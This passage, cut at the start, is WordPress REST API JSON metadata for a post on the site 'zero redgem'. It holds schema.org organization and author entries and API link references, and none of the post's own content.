redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41403","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41403"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41403\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41403"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41403"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41403"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}